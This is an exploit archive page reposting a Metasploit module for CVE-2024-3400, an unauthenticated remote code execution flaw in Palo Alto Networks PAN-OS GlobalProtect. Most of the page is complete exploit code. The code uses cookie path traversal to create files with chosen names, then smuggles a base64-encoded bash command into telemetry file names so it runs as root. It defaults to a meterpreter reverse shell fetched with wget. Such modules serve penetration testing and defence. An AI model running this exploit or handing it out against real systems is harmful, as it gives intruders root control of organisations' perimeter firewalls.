exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution

Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution
Posted Apr 23, 2024
Authored by sfewer-r7, remmons-r7 | Site metasploit.com

This Metasploit module exploits two vulnerabilities in Palo Alto Networks PAN-OS that allow an unauthenticated attacker to create arbitrarily named files and execute shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or GlobalProtect Portal enabled and telemetry collection on (default). Multiple versions are affected. Payloads may take up to one hour to execute, depending on how often the telemetry service is set to run.

tags | exploit, shell, vulnerability
advisories | CVE-2024-3400
SHA-256 | 9c69f9786e45a27c7e5254838feb1083b7180cc983336792158dcfa2db1cdf80

Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution',
'Description' => %q{
This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that
allow an unauthenticated attacker to create arbitrarily named files and execute
shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or
GlobalProtect Portal enabled and telemetry collection on (default). Affected versions
include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,
< 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to
one hour to execute, depending on how often the telemetry service is set to run.
},
'License' => MSF_LICENSE,
'Author' => [
'remmons-r7', # Metasploit module
'sfewer-r7' # Metasploit module
],
'References' => [
['CVE', '2024-3400'], # At the time of announcement, both vulnerabilities were assigned one CVE identifier
['URL', 'https://security.paloaltonetworks.com/CVE-2024-3400'], # Vendor Advisory
['URL', 'https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/'], # Initial Volexity report of the 0day exploitation
['URL', 'https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis'] # Rapid7 Analysis
],
'DisclosureDate' => '2024-04-12',
'Platform' => [ 'linux', 'unix' ],
'Arch' => [ARCH_CMD],
'Privileged' => true, # Executes as root on Linux
'Targets' => [ [ 'Default', {} ] ],
'DefaultOptions' => {
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
'FETCH_COMMAND' => 'WGET',
'RPORT' => 443,
'SSL' => true,
'FETCH_WRITABLE_DIR' => '/var/tmp',
'WfsDelay' => 3600 # 1h, since telemetry service cronjob can take up to an hour
},
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
IOC_IN_LOGS,
# The /var/log/pan/gpsvc.log file will log an unmarshal failure message for every malformed session created
# The NGINX frontend web server, which proxies requests to the GlobalProtect service, will log client IPs in /var/log/nginx/sslvpn_access.log
# Similarly, the log file /var/log/pan/sslvpn-access/sslvpn-access.log will also contain a log of the HTTP requests
# The "device_telemetry_*.log" files in /var/log/pan will log the command being injected
ARTIFACTS_ON_DISK
# Several 0 length files are created in the following directories during checks and exploitation:
# - /opt/panlogs/tmp/device_telemetry/hour/
# - /opt/panlogs/tmp/device_telemetry/minute/
# - /var/appweb/sslvpndocs/global-protect/portal/fonts/
]
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'An existing web application endpoint', '/global-protect/login.esp']),
]
)
end

def check
# Try to create a new empty file in an accessible directory with the exploit primitive
# This file name was chosen because an extension in (css|js|eot|woff|woff2|ttf) is required for correct NGINX routing, and similarly named files already exist in the 'fonts' directory
file_check_name = "glyphicons-#{Rex::Text.rand_text_alpha_lower(8)}-regular.woff2"
touch_file("/var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name}")

# Access that file and a file that doesn't exist to confirm they return 403 and 404, respectively
res_check_created = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri('global-protect', 'portal', 'fonts', file_check_name)
)

return CheckCode::Unknown('Connection failed') unless res_check_created

res_check_not_created = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri('global-protect', 'portal', 'fonts', "X#{file_check_name}")
)

return CheckCode::Unknown('Connection failed') unless res_check_not_created

if (res_check_created.code != 403) || (res_check_not_created.code != 404)
return CheckCode::Safe('Arbitrary file write did not succeed')
end

CheckCode::Vulnerable("Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name} NOTE: This file will not be deleted")
end

def touch_file(file)
# Exploit primitive similar to `touch`, creating an empty file owned by root in the specified location
fail_with(Failure::BadConfig, 'Semicolon cannot be present in file name, due to the cookie injection context') if file.include? ';'

send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'headers' => {
'Cookie' => "SESSID=./../../../..#{file}"
}
)
end

def exploit
# Encode the shell command payload as base64, then embed it in the appropriate exploitation context
# Since payloads cannot contain spaces, ${IFS} is used as a separator
cmd = "echo${IFS}-n${IFS}#{Rex::Text.encode_base64(payload.encoded)}|base64${IFS}-d|bash${IFS}-"

# Create maliciously named files in both telemetry directories that might be used by affected versions
# Both files are necessary, since it seems that some PAN-OS versions only execute payloads in 'hour' and others use 'minute'.
# It's possible that the payload will execute twice, but we've only observed one location working during testing
files = [
"/opt/panlogs/tmp/device_telemetry/hour/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`",
"/opt/panlogs/tmp/device_telemetry/minute/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`"
]

files.each do |file_path|
vprint_status("Creating file at #{file_path}")
touch_file(file_path)

# Must register for clean up here instead of within touch_file, since touch_file is used in the check
register_file_for_cleanup(file_path)
end

print_status('Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload')
print_status('Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled')
end
end
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    18 Files
  • 21
    Jun 21st
    8 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    19 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close